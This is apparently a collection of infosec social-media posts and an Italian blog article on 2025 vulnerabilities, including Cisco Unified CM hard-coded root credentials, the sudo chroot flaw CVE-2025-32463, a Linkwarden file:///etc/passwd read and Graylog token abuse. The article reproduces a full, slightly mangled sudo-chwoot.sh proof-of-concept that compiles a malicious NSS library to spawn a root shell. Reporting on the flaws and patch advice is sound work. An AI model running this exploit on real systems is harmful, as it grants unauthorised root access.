Are you fucking kidding me Cisco? Again?

https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssh-m4UBdpE7

sev:CRIT 10.0 🥳

A vulnerability in Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an unauthenticated, remote attacker to log in to an affected device using the root account, which has default, static credentials that cannot be changed or deleted.

https://nvd.nist.gov/vuln/detail/CVE-2025-20309

A note on the security advisory for CVE-2025-20309 in Cisco Unified Communications Manager which covers hard coded credentials - as I understand it this only impacts a special version of the product that users would have to contact TAC to get. If that is a correct understanding then I would expect this to limit the likelihood that organizations are running the impacted versions.

Quoting from the advisory:

This vulnerability affects Cisco Unified CM and Unified CM SME Engineering Special (ES) releases 15.0.1.13010-1 through 15.0.1.13017-1, regardless of device configuration.

Note: ES releases are limited fix releases that are distributed only by the Cisco Technical Assistance Center (TAC).

Reference: https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cucm-ssh-m4UBdpE7

#Security #CVE_2025_20309 #CVE202520309

@_newick NIST hasn't published it then. It's also available here: https://www.cve.org/CVERecord?id=CVE-2025-20309

🚨 CRITICAL: CVE-2025-20309 in Cisco Unified CM (v15.0.1.13010-1 to 13017-1) allows remote root access via unchangeable hard-coded creds. Patch as soon as available & restrict access! https://radar.offseq.com/threat/cve-2025-20309-use-of-hard-coded-credentials-in-ci-1eaa1647 #OffSeq #Cisco #Vuln #InfoSec

#CVE202532463 #CVE202532462 https://infosec.place/objects/ee0229ad-ede8-4964-a1bd-20068860e66e

„Sudo before 1.9.17p1 allows local users to obtain root access because /etc/nsswitch.conf from a user-controlled directory is used with the --chroot option.“
https://euvd.enisa.europa.eu/vulnerability/EUVD-2025-19673

You should update sudo.

You also might want to think about using an alternative to sudo, considering its high level of complexity in code and configuration.
„doas“ is much leaner in both code and configuration, which helps to avoid certain problems.

https://github.com/slicer69/doas/
#Unix #Security #CVE_2025_32463

Local Privilege Escalation to Root via Sudo Chroot in Linux https://github.com/kh4sh3i/CVE-2025-32463

Another one to keep in mind for future CTF challenges:

"CVE-2025-32463: sudo local privilege escalation via chroot option"

An attacker can leverage sudo's -R (--chroot) option to run
arbitrary commands as root, even if they are not listed in the sudoers file.

Sudo versions 1.9.14 to 1.9.17 affected.

https://www.openwall.com/lists/oss-security/2025/06/30/3 #infosec #cve

engang for hundre år siden, da jeg først begynte med #Linux, så var liksom ikke #sudo en greie. Og så ble det det, og en del av oss himlet litt med øynene av "sudo su" og sånt, men så ble det etter hvert ganske vanlig.

Men mellom det @pid_eins har skravlet om rundt #run0, og @trifectatech sin #sudors, så er det kanskje på tide å gå tilbake til å ikke ha vanilla sudo på maskina igjen?

https://www.stratascale.com/vulnerability-alert-CVE-2025-32463-sudo-chroot

Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463

Nella giornata di ieri, Red Hot Cyber ha pubblicato un approfondimento su una grave vulnerabilità scoperta in SUDO (CVE-2025-32463), che consente l’escalation dei privilegi a root in ambienti Linux sfruttando un abuso della funzione chroot.

L’exploit, reso pubblico da Stratascale, dimostra come un utente non privilegiato possa ottenere l’accesso root tramite una precisa catena di operazioni che sfruttano un comportamento errato nella gestione dei processi figli in ambienti chroot.

Test sul campo: la parola a Manuel Roccon del gruppo HackerHood

Manuel Roccon, ricercatore del gruppo HackerHood di Red Hot Cyber, ha voluto mettere le mani sull’exploit per verificarne concretamente la portata e valutarne la replicabilità in ambienti reali. “Non potevo resistere alla tentazione di provarlo in un ambiente isolato. È impressionante quanto sia diretto e pulito il meccanismo, una volta soddisfatti i requisiti richiesti dal PoC”, afferma Manuel.

Il team ha quindi testato il Proof of Concept pubblicato da Stratascale Exploit CVE-2025-32463 – sudo chroot. Il risultato? Privilege escalation ottenuta con successo.

youtube.com/embed/-GxiqS-f7Yg?…

Dettagli dell’exploit

L’exploit sfrutta una condizione in cui sudo esegue un comando in un ambiente chroot, lasciando tuttavia aperte alcune possibilità al processo figlio di uscire dal chroot e di manipolare lo spazio dei nomi dei processi (namespace) fino ad ottenere accesso completo come utente root.

L’exploit CVE-2025-32463, dimostrato nel PoC sudo-chwoot.sh di Rich Mirch (Stratascale CRU), sfrutta una vulnerabilità in sudo che consente a un utente non privilegiato di ottenere privilegi di root quando sudo viene eseguito con l’opzione -R (che specifica un chroot directory). Lo script crea un ambiente temporaneo (/tmp/sudowoot.stage.*), compila una libreria condivisa malevola (libnss_/woot1337.so.2) contenente una funzione constructor che eleva i privilegi e apre una shell root (/bin/bash), e forza sudo a caricarla come libreria NSS nel contesto chroot.

La tecnica sfrutta un errore logico nella gestione della libreria NSS in ambienti chroot, dove sudo carica dinamicamente librerie esterne senza isolarle correttamente. Lo script imposta infatti una finta configurazione nsswitch.conf per forzare l’uso della propria libreria, posizionandola all’interno della directory woot/, che funge da root virtuale per il chroot. Quando sudo -R woot woot viene eseguito, la libreria woot1337.so.2 viene caricata, e il codice eseguito automaticamente grazie all’attributo __attribute__((constructor)), ottenendo così l’escalation dei privilegi.

I requisiti fondamentali per sfruttare con successo questa vulnerabilità includono:

• L’abilitazione dell’uso di chroot tramite sudo.
• L’assenza di alcune restrizioni nei profili di sicurezza (come AppArmor o SELinux).
• Una configurazione permissiva di sudoers.

Di seguito le semplici righe

#!/bin/bash
# sudo-chwoot.sh
# CVE-2025-32463 – Sudo EoP Exploit PoC by Rich Mirch
# @ Stratascale Cyber Research Unit (CRU)
STAGE=$(mktemp -d /tmp/sudowoot.stage.XXXXXX)
cd ${STAGE?} || exit 1

cat > woot1337.c
#include

__attribute__((constructor)) void woot(void) {
setreuid(0,0);
setregid(0,0);
chdir("/");
execl("/bin/bash", "/bin/bash", NULL);
}
EOF

mkdir -p woot/etc libnss_
echo "passwd: /woot1337" > woot/etc/nsswitch.conf
cp /etc/group woot/etc
gcc -shared -fPIC -Wl,-init,woot -o libnss_/woot1337.so.2 woot1337.c

echo "woot!"
sudo -R woot woot
rm -rf ${STAGE?}

Conclusioni

Il test effettuato da Manuel Roccon dimostra quanto questa vulnerabilità non sia solo teorica, ma pienamente sfruttabile in ambienti di produzione non correttamente protetti. In scenari DevOps o containerizzati, dove l’uso di sudo e chroot è comune, i rischi aumentano considerevolmente.

Red Hot Cyber e il gruppo HackerHood raccomandano l’immediato aggiornamento di SUDO all’ultima versione disponibile, e la revisione delle configurazioni di sicurezza relative a chroot e permessi sudoers.

La sicurezza parte dalla consapevolezza. Continuate a seguirci per analisi tecniche, PoC testati e segnalazioni aggiornate.

L'articolo Linux Pwned! Privilege Escalation su SUDO in 5 secondi. HackerHood testa l’exploit CVE-2025-32463 proviene da il blog della sicurezza informatica.

Cette faille critique dans MegaRAC menace des milliers de serveurs, y compris ceux éteints ! https://www.it-connect.fr/faille-ami-megarac-cve-2024-54085/ #ActuCybersécurité #Cybersécurité #Vulnérabilité

Eclypsium has released two Nuclei templates to detect BMC vulnerabilities: CVE-2024-54085 (recently added to the CISA KEV) and CVE-2023-34329 (very similar). Please use them and send us feedback! Happy patching!

Blog post: https://eclypsium.com/blog/eclypsium-releases-tools-for-detecting-ami-megarac-bmc-vulnerabilities/

#CVE202532463 #CVE202532462 https://infosec.place/objects/ee0229ad-ede8-4964-a1bd-20068860e66e

Hilarious LFI in Linkwarden.

https://github.com/linkwarden/linkwarden/security/advisories/GHSA-rfc2-x8hr-536q

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N

Linkwarden is a self-hosted, open-source collaborative bookmark manager to collect, organize and archive webpages. In version 2.10.2, the server accepts links of format file:///etc/passwd and doesn't do any validation before sending them to parsers and playwright, this can result in leak of other user's links (and in some cases it might be possible to leak environment secrets). This issue has been patched in version 2.10.3 which has not been made public at time of publication.

https://nvd.nist.gov/vuln/detail/CVE-2025-49588

Whoopsie. DoS in ModSecurity.

https://github.com/owasp-modsecurity/ModSecurity/security/advisories/GHSA-gw9c-4wfm-vj3x

sev:MED 6.5 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

ModSecurity is an open source, cross platform web application firewall (WAF) engine for Apache, IIS and Nginx. In versions 2.9.8 to before 2.9.11, an empty XML tag can cause a segmentation fault. If SecParseXmlIntoArgs is set to On or OnlyArgs, and the request type is application/xml, and at least one XML tag is empty (eg ), then a segmentation fault occurs. This issue has been patched in version 2.9.11. A workaround involves setting SecParseXmlIntoArgs to Off.

https://nvd.nist.gov/vuln/detail/CVE-2025-52891

PrivEsc in Graylog.

https://github.com/Graylog2/graylog2-server/security/advisories/GHSA-3m86-c9x3-vwm9

sev:HIGH 8.8 - CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Graylog is a free and open log management platform. In versions 6.2.0 to before 6.2.4 and 6.3.0-alpha.1 to before 6.3.0-rc.2, Graylog users can gain elevated privileges by creating and using API tokens for the local Administrator or any other user for whom the malicious user knows the ID. For the attack to succeed, the attacker needs a user account in Graylog. They can then proceed to issue hand-crafted requests to the Graylog REST API and exploit a weak permission check for token creation. This issue has been patched in versions 6.2.4 and 6.3.0-rc.2. A workaround involves disabling the respective configuration found in System > Configuration > Users > "Allow users to create personal access tokens".

https://nvd.nist.gov/vuln/detail/CVE-2025-53106

Other options:
Exfiltrator
Malicious Payload
CVE-2010-2772

🚨 CRITICAL: CVE-2025-53104 in gluestack-ui (< e6b4271) allows command injection via discussion-to-slack.yml GitHub Actions workflow. Remove/disable the workflow to prevent remote code execution! https://radar.offseq.com/threat/cve-2025-53104-cwe-77-improper-neutralization-of-s-24128111 #OffSeq #Infosec #GitHubActions #AppSec

Supposed PoC: https://github.com/DarkNavySecurity/PoC/blob/main/CVE-2025-6554/poc.js